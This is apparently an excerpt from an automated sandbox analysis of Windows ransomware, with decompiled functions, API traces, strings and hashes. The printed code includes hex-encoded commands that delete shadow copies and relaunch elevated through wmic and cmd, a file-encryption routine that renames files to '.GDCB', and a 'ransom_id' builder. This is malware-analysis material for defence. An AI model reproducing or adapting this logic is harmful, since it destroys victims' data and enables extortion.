					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0f1d43f6
0x0f1d4492
0x0f1d449c
0x0f1d44a4
0x0f1d44ac
0x0f1d44b0
0x0f1d44b8
0x0f1d44bc
0x0f1d44c4
0x0f1d44c9
0x0f1d44d1
0x0f1d44d9
0x0f1d44e1
0x0f1d44e9
0x0f1d44f1
0x0f1d44f9
0x0f1d4504
0x0f1d450f
0x0f1d451a
0x0f1d4525
0x0f1d4530
0x0f1d453b
0x0f1d4546
0x0f1d4551
0x0f1d455c
0x0f1d4567
0x0f1d4572
0x0f1d457d
0x0f1d43fc
0x0f1d43fe
0x0f1d4406
0x0f1d440e
0x0f1d4412
0x0f1d441a
0x0f1d441e
0x0f1d4426
0x0f1d442e
0x0f1d4436
0x0f1d443e
0x0f1d4443
0x0f1d444b
0x0f1d4453
0x0f1d445b
0x0f1d4463
0x0f1d446b
0x0f1d4473
0x0f1d447b
0x0f1d4483
0x0f1d4483
0x0f1d4596
0x0f1d45a5
0x0f1d45a9
0x0f1d45b5
0x0f1d45bd
0x0f1d45d3
0x0f1d45db
0x0f1d45dd
0x0f1d45ab
0x0f1d45ab
0x0f1d45ab
0x0f1d45e7
0x0f1d45f5

APIs

Part of subcall function 0F1D3B20: _memset.LIBCMT ref: 0F1D3B72
Part of subcall function 0F1D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F1D3B96
Part of subcall function 0F1D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F1D3B9A
Part of subcall function 0F1D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F1D3B9E
Part of subcall function 0F1D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F1D3BC5

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F1D459F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F1D45B5
lstrcatW.KERNEL32(00000000,0063005C), ref: 0F1D45BD
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F1D45D3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D45E7

Strings

\, xrefs: 0F1D43FE
a, xrefs: 0F1D444B
x, xrefs: 0F1D4436
m, xrefs: 0F1D44E9
i, xrefs: 0F1D4426
d, xrefs: 0F1D4530
h, xrefs: 0F1D4525
, xrefs: 0F1D451A
\, xrefs: 0F1D4492
d, xrefs: 0F1D44F9
l, xrefs: 0F1D455C
s, xrefs: 0F1D44D9
n, xrefs: 0F1D44F1
m, xrefs: 0F1D4412
e, xrefs: 0F1D447B
/, xrefs: 0F1D4567
e, xrefs: 0F1D4473
l, xrefs: 0F1D4504
e, xrefs: 0F1D4483
c, xrefs: 0F1D445B
o, xrefs: 0F1D4453
e, xrefs: 0F1D457D
a, xrefs: 0F1D44E1
x, xrefs: 0F1D44BC
., xrefs: 0F1D44B0
p, xrefs: 0F1D4463
s, xrefs: 0F1D4443
b, xrefs: 0F1D4406
, xrefs: 0F1D4546
, xrefs: 0F1D44D1
t, xrefs: 0F1D450F
/, xrefs: 0F1D44C9
a, xrefs: 0F1D4551
w, xrefs: 0F1D441E
w, xrefs: 0F1D453B
, xrefs: 0F1D446B
., xrefs: 0F1D442E
m, xrefs: 0F1D449C
open, xrefs: 0F1D45CC
u, xrefs: 0F1D4572

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 3cbf413d6dc5471a634dad025bc318986f56203ce3a158f0a3a7c0f9e1540c0e
Instruction ID: 1a1960d5b7d9ebde7ca4d06c71925905d4031f7876c5bbcfaf17abd5f7b3e834
Opcode Fuzzy Hash: 3cbf413d6dc5471a634dad025bc318986f56203ce3a158f0a3a7c0f9e1540c0e
Instruction Fuzzy Hash: 0E4106B0149380DEE320CF119849B5BBEE6BF85B49F10491CF6985A292C7F6858CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D3BE0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D3BE0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F1D3B20(__edx);
				if(_t54 != 0) {
					_t54 = E0F1D3AA0();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0f1d3bef
0x0f1d3bf1
0x0f1d3bf8
0x0f1d3bfe
0x0f1d3c05
0x0f1d3c17
0x0f1d3c24
0x0f1d3c2d
0x0f1d3c35
0x0f1d3c3d
0x0f1d3c45
0x0f1d3c4d
0x0f1d3c55
0x0f1d3c5d
0x0f1d3c65
0x0f1d3c6d
0x0f1d3c75
0x0f1d3c7d
0x0f1d3c85
0x0f1d3c8d
0x0f1d3c98
0x0f1d3ca8
0x0f1d3cb1
0x0f1d3cb9
0x0f1d3cc1
0x0f1d3cc9
0x0f1d3cd1
0x0f1d3cd9
0x0f1d3ce1
0x0f1d3ce9
0x0f1d3cf4
0x0f1d3cff
0x0f1d3d0a
0x0f1d3d15
0x0f1d3d20
0x0f1d3d2b
0x0f1d3d36
0x0f1d3d41
0x0f1d3d4c
0x0f1d3d57
0x0f1d3d71
0x0f1d3d73
0x0f1d3d79
0x0f1d3d80
0x0f1d3d8c
0x0f1d3d8e
0x0f1d3d95
0x0f1d3d9d
0x0f1d3da5
0x0f1d3dad
0x0f1d3db7
0x0f1d3dc1
0x0f1d3dc4
0x0f1d3dcb
0x0f1d3dd2
0x0f1d3de0
0x0f1d3de1
0x0f1d3de5
0x00000000
0x00000000
0x0f1d3de7
0x0f1d3deb
0x00000000
0x00000000
0x0f1d3df4
0x00000000
0x0f1d3df4
0x0f1d3e06
0x0f1d3e0f
0x0f1d3e17
0x0f1d3e17
0x0f1d3c05
0x0f1d3dfa
0x0f1d3e00

APIs

Part of subcall function 0F1D3B20: _memset.LIBCMT ref: 0F1D3B72
Part of subcall function 0F1D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F1D3B96
Part of subcall function 0F1D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F1D3B9A
Part of subcall function 0F1D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F1D3B9E
Part of subcall function 0F1D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F1D3BC5

Part of subcall function 0F1D3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F1D3AD0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F1D3C8D
wsprintfW.USER32 ref: 0F1D3D57
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F1D3D6B
GetForegroundWindow.USER32 ref: 0F1D3D80
ShellExecuteExW.SHELL32(00000000), ref: 0F1D3DE1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D3DF4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F1D3E06
CloseHandle.KERNEL32(?), ref: 0F1D3E0F
ExitProcess.KERNEL32 ref: 0F1D3E17

Strings

c, xrefs: 0F1D3C85
s, xrefs: 0F1D3DA5
e, xrefs: 0F1D3CB1
2, xrefs: 0F1D3C5D
d, xrefs: 0F1D3C2D
c, xrefs: 0F1D3CC1
e, xrefs: 0F1D3C6D
t, xrefs: 0F1D3D36
m, xrefs: 0F1D3CFF
a, xrefs: 0F1D3D2B
s, xrefs: 0F1D3D20
y, xrefs: 0F1D3C45
s, xrefs: 0F1D3CB9
, xrefs: 0F1D3CD1
i, xrefs: 0F1D3C24
e, xrefs: 0F1D3CE9
%, xrefs: 0F1D3D41
", xrefs: 0F1D3CF4
", xrefs: 0F1D3D4C
p, xrefs: 0F1D3C98
n, xrefs: 0F1D3D9D
w, xrefs: 0F1D3C65
\, xrefs: 0F1D3C3D
\, xrefs: 0F1D3C75
r, xrefs: 0F1D3CD9
, xrefs: 0F1D3D0A
m, xrefs: 0F1D3C55
r, xrefs: 0F1D3D95
%, xrefs: 0F1D3C17
t, xrefs: 0F1D3C4D
c, xrefs: 0F1D3D15
a, xrefs: 0F1D3CE1
r, xrefs: 0F1D3C35
o, xrefs: 0F1D3CA8
l, xrefs: 0F1D3CC9

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: af039ac514734d6c2100516fb7a41f4db2369bcf408732b51116e0f1e482c2a7
Instruction ID: e41f69882ad8b88d591c4166af8c7033cc57856a2d1f900945a6f27807ab9021
Opcode Fuzzy Hash: af039ac514734d6c2100516fb7a41f4db2369bcf408732b51116e0f1e482c2a7
Instruction Fuzzy Hash: 2D513AB0109341DFE320CF51D44875ABFF9BF84759F004A1DE59886252D7FA9198CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D35E0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0F1D35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F1D63D0(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v56 = _t162;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf1e04b0]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf1e04b0]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf1e04b0]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F1D82A0( &_v104, 0x10);
				E0F1D82A0( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F1D6530(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F1D6530(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F1D83C0( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F1D89C0(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F1D3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0f1d35eb
0x0f1d35ed
0x0f1d35f1
0x0f1d35ff
0x0f1d3608
0x0f1d3613
0x0f1d361f
0x0f1d3621
0x0f1d363c
0x0f1d363e
0x0f1d3647
0x0f1d364a
0x0f1d3651
0x0f1d3658
0x0f1d3663
0x0f1d3669
0x0f1d3676
0x0f1d367e
0x0f1d367f
0x0f1d368a
0x0f1d368f
0x0f1d3693
0x0f1d369b
0x0f1d36a0
0x0f1d36b0
0x0f1d36c6
0x0f1d36c8
0x0f1d36de
0x0f1d36e4
0x0f1d36e9
0x0f1d36ec
0x0f1d36f1
0x0f1d36f3
0x0f1d36f8
0x0f1d3703
0x0f1d3706
0x0f1d370a
0x0f1d3711
0x0f1d371f
0x0f1d3724
0x0f1d3729
0x0f1d3767
0x0f1d376c
0x0f1d3771
0x0f1d37a0
0x0f1d37a5
0x0f1d37c3
0x0f1d37c5
0x0f1d37cb
0x0f1d380b
0x0f1d3819
0x0f1d381f
0x0f1d3826
0x0f1d3828
0x0f1d382a
0x0f1d382d
0x0f1d3835
0x0f1d3850
0x0f1d3855
0x0f1d385b
0x0f1d3867
0x0f1d386a
0x0f1d386d
0x0f1d386f
0x0f1d3872
0x0f1d3875
0x0f1d387a
0x0f1d3880
0x0f1d3880
0x0f1d3881
0x0f1d3885
0x0f1d3885
0x0f1d389b
0x0f1d38a2
0x0f1d38a7
0x0f1d38aa
0x0f1d38ad
0x0f1d38c2
0x0f1d38da
0x0f1d38df
0x0f1d38e2
0x0f1d38e2
0x0f1d38ef
0x0f1d3902
0x0f1d391d
0x0f1d391f
0x0f1d3924
0x0f1d3924
0x0f1d392f
0x0f1d3935
0x0f1d393a
0x0f1d3832
0x00000000
0x0f1d3832
0x0f1d393a
0x00000000
0x0f1d3855
0x0f1d3950
0x0f1d3956
0x0f1d3967
0x0f1d397c
0x0f1d398c
0x0f1d398c
0x0f1d3993
0x0f1d39a6
0x0f1d39a9
0x0f1d39b5
0x0f1d39c1
0x0f1d39c7
0x0f1d39cf
0x0f1d39cf
0x0f1d39d5
0x0f1d37cd
0x0f1d37db
0x0f1d37e7
0x0f1d37e9
0x0f1d37ec
0x0f1d37f4
0x0f1d37f4
0x0f1d3773
0x0f1d3773
0x0f1d377f
0x0f1d3782
0x0f1d378a
0x0f1d378a
0x0f1d372b
0x0f1d3738
0x0f1d3744
0x0f1d3747
0x0f1d374f
0x0f1d374f
0x0f1d39e2
0x0f1d39ee

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F1D35F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F1D35FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F1D363A
lstrcpyW.KERNEL32 ref: 0F1D3658
lstrcatW.KERNEL32(00000000,0047002E), ref: 0F1D3663

Part of subcall function 0F1D82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1D82C0
Part of subcall function 0F1D82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F1D82E8
Part of subcall function 0F1D82A0: GetModuleHandleA.KERNEL32(?), ref: 0F1D833D
Part of subcall function 0F1D82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1D834B
Part of subcall function 0F1D82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1D835A
Part of subcall function 0F1D82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1D837E
Part of subcall function 0F1D82A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D838C

Part of subcall function 0F1D82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F1D292B), ref: 0F1D83A0
Part of subcall function 0F1D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F1D292B), ref: 0F1D83AE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F1D36C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F1D36F1

Part of subcall function 0F1D6530: EnterCriticalSection.KERNEL32(0F1E2A48,?,0F1D3724,00000000,00000000,00000000,?,00000800), ref: 0F1D653B
Part of subcall function 0F1D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F1D3724,00000000,00000000,00000000), ref: 0F1D655E
Part of subcall function 0F1D6530: GetLastError.KERNEL32(?,0F1D3724,00000000,00000000,00000000), ref: 0F1D6568
Part of subcall function 0F1D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1D3724,00000000,00000000,00000000), ref: 0F1D6584

MessageBoxA.USER32 ref: 0F1D3738
GetLastError.KERNEL32 ref: 0F1D3773
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D39E2

Strings

., xrefs: 0F1D363E
, xrefs: 0F1D370A
B, xrefs: 0F1D3651
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0F1D3732
D, xrefs: 0F1D364A
Fatal error, xrefs: 0F1D372D

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
API String ID: 1177701972-69869980
Opcode ID: 464d7430caed0bcec3d98db8f28e1f1a071adbfda9d56fc9e787c1651398f34a
Instruction ID: a37ab444ef6bc2bb11ff38eaad793a640e1a58d6004af9fa73c8855119d0dea3
Opcode Fuzzy Hash: 464d7430caed0bcec3d98db8f28e1f1a071adbfda9d56fc9e787c1651398f34a
Instruction Fuzzy Hash: 6FC15D71E41319ABEB11CBA4DC46FEEBBB8BF08711F204115F640BA1C2DBB96954CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D40E0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0F1D40E0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf1e2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F1D39F0( &_v148);
				E0F1D7330( &_v236, __edx);
				_t97 = E0F1D7140( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F1D6F40( &_v152, _t98);
				_t60 = E0F1D8090(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf1e04a0]");
				_t77 = 0xf1e2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
